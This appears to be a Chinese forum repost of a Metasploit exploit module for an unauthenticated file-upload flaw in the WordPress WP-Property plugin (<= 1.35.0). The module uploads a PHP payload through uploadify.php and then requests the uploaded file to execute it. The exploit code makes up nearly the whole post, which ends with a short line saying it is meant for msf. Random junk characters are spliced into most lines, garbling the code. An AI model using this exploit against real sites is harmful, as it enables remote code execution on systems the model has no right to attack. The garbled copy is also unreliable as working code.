WordPress WP-Property PHP 文件上传漏洞
! s* Y$ T! [9 R+ a% A+ m, A
9 \' L( N3 W p2 ~7 L' |7 ~ ## # This file is part of the Metasploit Framework and may be subject to* W! `- Y- R4 j! O- @
! x* g3 |/ q/ O2 o+ e2 q
# redistribution and commercial restrictions. Please see the Metasploit
+ t3 {0 [9 Y1 w' ^3 r
/ k" ]$ e2 C( W# Framework web site for more information on licensing and terms of use.4 K( ^: T, a. @+ @" _5 }
( N, ~/ F/ ~1 [3 y3 U
# http://metasploit.com/framework/ ##+ S1 |' i, I+ g) _
0 w, B. U2 }: h5 v! @ 0 y- |) C% E0 n$ C1 d r. J
5 F: s9 ?( S! l' A+ @2 }
1 r- \9 E' D; }$ Z M; m
6 f" _+ @( l) q# k7 rrequire 'msf/core'
- K! {* }, ]& X& S erequire 'msf/core/exploit/php_exe'
2 I6 M1 |( V9 E
: ~6 f! U4 ~) j; @8 Nclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit:hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',$ X Q. c6 f, x" u% ?- X- d
'Description' => %q{6 }. q2 H7 s+ s6 i/ `3 |& ?5 h! X
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
# d/ T% h/ o1 ]: x8 O$ ~% s' \' ?[9 ]1 z( Y( V2 F9 k1 K
'Sammy FORGIT', # initial discovery9 |2 u2 r: ]% z- E. w
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
) z& `& M$ }0 {, Y( X* R$ [% B],
& {0 l! n' I/ Z'License' => MSF_LICENSE,
+ f% u4 U# \2 `7 j' b'References' =>% U9 C Q; g2 }" @8 y) e7 C
[; Z; w1 x; W3 `7 p9 \4 ~
[ 'OSVDB', '82656' ],
6 w$ M2 c; N9 O5 ]$ \8 A[ 'BID', '53787' ],
, ?2 W+ j, g7 G, m$ Y, u" @) g1 W[ 'EDB', '18987'],
9 A0 m. Q' S* _[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]; T) v( x5 X) r
],
9 n7 `/ T$ d, T6 d2 I'Payload' =>4 F+ x# k/ e3 u- M7 e4 N$ Y
{
) ~ _6 g" ]5 O5 ~* [5 }( V( ^+ S'BadChars' => "\x00",( X j; V6 R- {5 E2 F
},6 C- s+ Y4 T4 M" d+ n
'Platform' => 'php',9 s8 {+ u9 z2 q0 W7 d' a# F4 p
'Arch' => ARCH_PHP,% d4 \. S0 m& u7 q1 b P9 M& x
'Targets' =>
6 R- |1 l( w6 d1 y2 G[
3 `! o3 y+ _- k. D, f7 ^) j[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],! F; e) B0 j+ A s# B% ?
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
2 B, [) [- |& S],% i/ x/ P9 e( A+ H. [& ]3 [9 f+ d* s
'DefaultTarget' => 0,$ k- B2 @4 b0 Q
'DisclosureDate' => 'Mar 26 2012'))
& p8 }. u X* x% U
$ I5 f8 g& S) i- yregister_options(3 ~ N4 S' B. ^3 Y3 k' Q1 D: S
[
% J+ E. W2 y. w# s( V; H/ lOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])8 B( w. {0 F7 c
], self.class)
7 `: S; F: p0 Eend
' f; G1 N$ T2 D# I8 w9 ^6 L8 M/ \. e0 K. Y# D( ^
def check% u6 B" ?' j$ |6 N% T" _, a8 Z; t
uri = target_uri.path
# A. z' c5 N% d* {uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',4 m0 d# N" ~% `# N
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"* q5 B7 q( M4 k. Q/ y5 j- T
}): ` F- S, M* }/ f2 e
! O$ Y' ]8 ?+ l; D+ J" K& e
if not res or res.code != 200" p- ~ b! J/ g+ m$ N
return Exploit::CheckCode::Unknown# l+ G1 r P# K/ p M8 N- E% Z
end
5 S: M- |' A/ N1 X1 t9 {) e, u* p' H i* B
return Exploit::CheckCode::Appears6 [2 j/ a. c$ l( R" A9 v" H8 h
end
$ g0 _4 }! k9 `4 k5 T
& W- p# P1 ?6 u; U% pdef exploit
- Q$ b. W3 n9 j+ X- f+ `uri = target_uri.path
8 p/ |( A8 X( h$ |- A: C/ w4 a3 euri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
; k2 P& B$ V3 g+ e9 u1 a- K1 r& t3 f" F- L9 O) F7 y5 O
data = Rex::MIME::Message.new
$ z7 w3 V. m0 f% c- n+ Qdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
$ y" A# |* \5 ^$ b) z9 z3 w+ ]1 Sdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")5 g" E3 _6 X3 _1 M
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
! w0 O, S& z( {* p7 H' t/ O7 }( s) ?0 X+ a
print_status("#{peer} - Uploading payload #{@payload_name}")
* X; S6 m) t0 w& a& W* J5 Dres = send_request_cgi({* s( Z1 f, m1 \ @ ~8 l" a
'method' => 'POST',# [$ G3 |# K& v) A$ F ?
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
5 N. L% m" n0 c. h/ @% c'ctype' => "multipart/form-data; boundary=#{data.bound}",) b! a9 M+ }+ ?$ Q- X1 N9 m6 Q" T8 l
'data' => post_data
0 Y" l$ ]( y5 [- U% P" i5 M})
* q! p( Z+ n+ Q9 B
* a+ l* c$ F% _- V( [( vif not res or res.code != 200 or res.body !~ /#{@payload_name}/
8 u3 w7 {/ N3 D" s% J0 Wfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")% q, f. p7 M2 C2 t
end
/ o1 O9 z, E7 [
/ V y I f$ l& J6 P; Fupload_uri = res.body6 j5 U) K# d7 ?8 j4 q
- ^ X) A: [- s# i7 ?
print_status("#{peer} - Executing payload #{@payload_name}")
+ U" c; ]$ {6 L2 ~, {4 yres = send_request_raw({
1 x! T, z9 b1 @/ o0 ^; M0 E' b$ h'uri' => upload_uri,
+ i+ R1 k4 C/ w. W$ n; Q'method' => 'GET'/ d' O) q/ B& }- e( S
})
7 z% }& z% P" nend
0 @# B' |$ t( {( i: _: ^end
3 Y: X C% \: a2 ~1 a7 V4 x
& J+ s4 m/ ?* f2 e& C不要问我这写的是什么 怎么利用 我是说msf." T e8 O2 n+ N* S3 F3 {" F
( B3 K1 R2 L& f& K. W
|